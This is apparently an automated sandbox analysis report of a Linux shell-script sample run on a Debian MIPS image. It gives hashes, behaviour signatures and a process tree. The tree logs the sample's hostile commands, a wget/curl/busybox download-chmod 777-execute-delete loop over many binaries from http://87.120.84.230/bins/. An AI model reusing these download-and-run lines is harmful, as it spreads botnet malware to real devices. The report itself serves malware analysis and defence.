Analysis
-
max time kernel
73s -
max time network
75s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipsel image:debian9-mipsel-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
25/10/2024, 01:06
Static task
static1
Behavioral task
behavioral1
Sample
0aa914c0d644e5aba7e457fb632f330f136f2c7251f7eb403f436a23e03ca2f3.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
0aa914c0d644e5aba7e457fb632f330f136f2c7251f7eb403f436a23e03ca2f3.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
0aa914c0d644e5aba7e457fb632f330f136f2c7251f7eb403f436a23e03ca2f3.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
0aa914c0d644e5aba7e457fb632f330f136f2c7251f7eb403f436a23e03ca2f3.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
0aa914c0d644e5aba7e457fb632f330f136f2c7251f7eb403f436a23e03ca2f3.sh
-
Size
10KB
-
MD5
a16f2f2454e5b18f780fd0e5f5db5230
-
SHA1
f8c9a2379edf5ce246d41383617f895ef5840d7c
-
SHA256
0aa914c0d644e5aba7e457fb632f330f136f2c7251f7eb403f436a23e03ca2f3
-
SHA512
79ee2c5eb57fb5281133280b36b26033038ef2ee4641bba5561500c47537cc2b656a2e7810a2879954bb95b143811d44dd0c01eee312b69c3267042254d35f92
-
SSDEEP
192:lVkP23rABx8p/2aJMkxUAQtiZEYq3rABxu2aJMkxkAQtiZEL:lVkP23rABx8p/2aJMkxbBq3rABxu2aJW
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
description ioc Process
File opened for reading /proc/sys/crypto/fips_enabled curl
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/0aa914c0d644e5aba7e457fb632f330f136f2c7251f7eb403f436a23e03ca2f3.sh/tmp/0aa914c0d644e5aba7e457fb632f330f136f2c7251f7eb403f436a23e03ca2f3.sh1⤵PID:702
-
/bin/rm/bin/rm bins.sh2⤵PID:707
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:711
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:722
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:729
-
-
/bin/chmodchmod 777 l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- File and Directory Permissions Modification
PID:731
-
-
/tmp/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh./l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- Executes dropped EXE
PID:732
-
-
/bin/rmrm l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:733
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:734
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:735
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:736
-
-
/bin/chmodchmod 777 tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- File and Directory Permissions Modification
PID:737
-
-
/tmp/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt./tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- Executes dropped EXE
PID:738
-
-
/bin/rmrm tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:739
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:740
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:741
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:742
-
-
/bin/chmodchmod 777 yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- File and Directory Permissions Modification
PID:743
-
-
/tmp/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9./yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- Executes dropped EXE
PID:744
-
-
/bin/rmrm yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:747
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:748
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:769
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:778
-
-
/bin/chmodchmod 777 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- File and Directory Permissions Modification
PID:786
-
-
/tmp/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh./5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- Executes dropped EXE
PID:788
-
-
/bin/rmrm 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:791
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:792
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:797
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:799
-
-
/bin/chmodchmod 777 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- File and Directory Permissions Modification
PID:800
-
-
/tmp/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI./9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- Executes dropped EXE
PID:801
-
-
/bin/rmrm 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:802
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:803
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:804
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:805
-
-
/bin/chmodchmod 777 FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- File and Directory Permissions Modification
PID:806
-
-
/tmp/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH./FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- Executes dropped EXE
PID:807
-
-
/bin/rmrm FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:808
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:809
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:810
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:819
-
-
/bin/chmodchmod 777 LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- File and Directory Permissions Modification
PID:824
-
-
/tmp/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz./LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- Executes dropped EXE
PID:826
-
-
/bin/rmrm LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:828
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:830
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:837
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:849
-
-
/bin/chmodchmod 777 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- File and Directory Permissions Modification
PID:851
-
-
/tmp/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN./94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- Executes dropped EXE
PID:852
-
-
/bin/rmrm 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:853
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:854
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- Reads runtime system information
- Writes file to tmp directory
PID:855
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:856
-
-
/bin/chmodchmod 777 WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- File and Directory Permissions Modification
PID:857
-
-
/tmp/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11./WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- Executes dropped EXE
PID:858
-
-
/bin/rmrm WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:859
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:860
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:861
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:862
-
-
/bin/chmodchmod 777 TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- File and Directory Permissions Modification
PID:863
-
-
/tmp/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk./TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- Executes dropped EXE
PID:864
-
-
/bin/rmrm TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:865
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:866
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:867
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:868
-
-
/bin/chmodchmod 777 cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM./cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- Executes dropped EXE
PID:870
-
-
/bin/rmrm cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:871
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:872
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:873
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:874
-
-
/bin/chmodchmod 777 GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo./GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- Executes dropped EXE
PID:876
-
-
/bin/rmrm GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:877
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:878
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:879
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:880
-
-
/bin/chmodchmod 777 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd./0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:883
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:884
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:886
-
-
/bin/chmodchmod 777 RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl./RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:889
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:890
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:892
-
-
/bin/chmodchmod 777 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd./0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- Executes dropped EXE
PID:894
-
-
/bin/rmrm 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:895
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:896
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:897
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:898
-
-
/bin/chmodchmod 777 RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl./RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:901
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:902
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:904
-
-
/bin/chmodchmod 777 l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh./l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:907
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:908
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:910
-
-
/bin/chmodchmod 777 tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt./tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:913
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:914
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:916
-
-
/bin/chmodchmod 777 yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- File and Directory Permissions Modification
PID:917
-
-
/tmp/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9./yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- Executes dropped EXE
PID:918
-
-
/bin/rmrm yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:919
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:920
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:921
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:922
-
-
/bin/chmodchmod 777 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh./5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- Executes dropped EXE
PID:924
-
-
/bin/rmrm 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:925
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:926
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:928
-
-
/bin/chmodchmod 777 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI./9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- Executes dropped EXE
PID:930
-
-
/bin/rmrm 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:931
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:932
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:934
-
-
/bin/chmodchmod 777 FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- File and Directory Permissions Modification
PID:935
-
-
/tmp/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH./FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- Executes dropped EXE
PID:936
-
-
/bin/rmrm FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:937
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:938
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:939
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:940
-
-
/bin/chmodchmod 777 LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz./LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:943
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:944
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:946
-
-
/bin/chmodchmod 777 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- File and Directory Permissions Modification
PID:947
-
-
/tmp/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN./94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- Executes dropped EXE
PID:948
-
-
/bin/rmrm 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:949
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:950
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- Reads runtime system information
- Writes file to tmp directory
PID:951
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:952
-
-
/bin/chmodchmod 777 WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11./WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:955
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:956
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:958
-
-
/bin/chmodchmod 777 TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- File and Directory Permissions Modification
PID:959
-
-
/tmp/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk./TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- Executes dropped EXE
PID:960
-
-
/bin/rmrm TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:961
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:962
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:963
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:964
-
-
/bin/chmodchmod 777 cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- File and Directory Permissions Modification
PID:965
-
-
/tmp/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM./cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- Executes dropped EXE
PID:966
-
-
/bin/rmrm cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:967
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:968
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:970
-
-
/bin/chmodchmod 777 GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- File and Directory Permissions Modification
PID:971
-
-
/tmp/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo./GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- Executes dropped EXE
PID:972
-
-
/bin/rmrm GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:973
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97